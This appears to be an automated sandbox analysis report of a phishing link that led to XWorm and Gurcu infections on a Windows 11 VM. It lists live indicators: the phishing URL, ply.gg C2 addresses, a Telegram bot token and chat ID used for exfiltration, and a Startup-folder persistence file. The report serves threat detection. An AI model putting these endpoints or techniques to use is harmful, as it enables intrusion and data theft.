gurcu | hxxp://click[.]pstmrk[.]it/3s/click[.]pstmrk[.]it%2F3%2F38[.]62[.]245[.]50%252Fcontract_file[.]html%2FgCbE%2FOBG3AQ%2FAQ%2F52ae3b51-1704-40c9-94ec-de54b84f9c9c%2F1%2F3kREGiBepU/gCbE/ORG3AQ/AQ/561d52bd-bfd6-46f3-a583-e2bbfc1cd77a/1/Hsj5ltVh0u

Analysis

max time kernel
1796s
max time network
1801s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06-08-2024 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://click.pstmrk.it/3s/click.pstmrk.it%2F3%2F38.62.245.50%252Fcontract_file.html%2FgCbE%2FOBG3AQ%2FAQ%2F52ae3b51-1704-40c9-94ec-de54b84f9c9c%2F1%2F3kREGiBepU/gCbE/ORG3AQ/AQ/561d52bd-bfd6-46f3-a583-e2bbfc1cd77a/1/Hsj5ltVh0u

Score

10^/10

gurcu xworm discovery execution phishing rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

20.ip.gl.ply.gg:61413

21.ip.gl.ply.gg:30704

Mutex

IJ1arWifhZJOz3Zf

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6584279699:AAEqagLrmPUC21iKUr3le2L8nbZJK6ktSFM/sendMessage?chat_id=5479981438

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot6584279699:AAEqagLrmPUC21iKUr3le2L8nbZJK6ktSFM/sendMessage?chat_id=5479981438

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/5680-5664-0x0000028E86F10000-0x0000028E86F20000-memory.dmp	family_xworm
behavioral1/memory/5844-5670-0x000001ABBE280000-0x000001ABBE28E000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 5304 created 3220	5304	python.exe	52
PID 5304 created 3220	5304	python.exe	52
PID 5700 created 3220	5700	python.exe	52
PID 5700 created 3220	5700	python.exe	52

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
36	1268	powershell.exe
37	4980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1268	powershell.exe
4980	powershell.exe
5196	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows update.lnk	cscript.exe

Executes dropped EXE 2 IoCs

pid	Process
5304	python.exe
5700	python.exe

Loads dropped DLL 12 IoCs

pid	Process
5304	python.exe
5304	python.exe
5304	python.exe
5304	python.exe
5304	python.exe
5304	python.exe
5700	python.exe
5700	python.exe
5700	python.exe
5700	python.exe
5700	python.exe
5700	python.exe

Detected phishing page
phishing
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = bb000000b500bbaf933ba7000400000000002d000000315350537343e50abe43ad4f85e469dc8633986e110000000b000000000b000000ffff000000000000490000003153505330f125b7ef471a10a5f102608c9eebac2d0000000a000000001f0000000d000000330038002e00360032002e003200340035002e003500300000000000000000002d000000315350533aa4bddeb337834391e74498da2995ab1100000003000000001300000000000000000000000000000000000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f580d1a2cf021be504388b07367fc96ef3c0000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\NodeSlot = "7"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-661032028-162657920-1226909816-1000\{A66CE7E9-72A8-4177-96D2-89E741B0FCBD}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 2e00c301c55c5c33382e36322e3234352e35305c66696c65004d6963726f736f6674204e6574776f726b000002000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailable = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000300000002000000010000000500000004000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 06000000000000000300000002000000010000000500000004000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailableTime = "240638750"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000060000000300000002000000010000000500000004000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000050000000400000003000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000de04f0a4efe4da01426cf50ef3e4da0188c480d4dce7da0114000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 030000000000000002000000010000000500000004000000ffffffff	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5680	notepad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1336	msedge.exe
1336	msedge.exe
4328	msedge.exe
4328	msedge.exe
1000	identity_helper.exe
1000	identity_helper.exe
3124	msedge.exe
3124	msedge.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
5196	powershell.exe
5196	powershell.exe
5196	powershell.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
5304	python.exe
5700	python.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe
5680	notepad.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5936	msedge.exe
5680	notepad.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
5304	python.exe
5304	python.exe
5700	python.exe
5700	python.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	5680	notepad.exe
Token: SeDebugPrivilege	5844	notepad.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
1860	AcroRd32.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe
4328	msedge.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
1860	AcroRd32.exe
5680	notepad.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5936	msedge.exe
5804	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4328 wrote to memory of 4488	4328	msedge.exe	81
PID 4328 wrote to memory of 4488	4328	msedge.exe	81
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1608	4328	msedge.exe	82
PID 4328 wrote to memory of 1336	4328	msedge.exe	83
PID 4328 wrote to memory of 1336	4328	msedge.exe	83
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84
PID 4328 wrote to memory of 3788	4328	msedge.exe	84

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://click.pstmrk.it/3s/click.pstmrk.it%2F3%2F38.62.245.50%252Fcontract_file.html%2FgCbE%2FOBG3AQ%2FAQ%2F52ae3b51-1704-40c9-94ec-de54b84f9c9c%2F1%2F3kREGiBepU/gCbE/ORG3AQ/AQ/561d52bd-bfd6-46f3-a583-e2bbfc1cd77a/1/Hsj5ltVh0u
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe57c13cb8,0x7ffe57c13cc8,0x7ffe57c13cd8
    3⤵
    PID:4488
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
    3⤵
    PID:1608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,10459109281860033568,12742494646657140021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
    3⤵
    PID:3788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
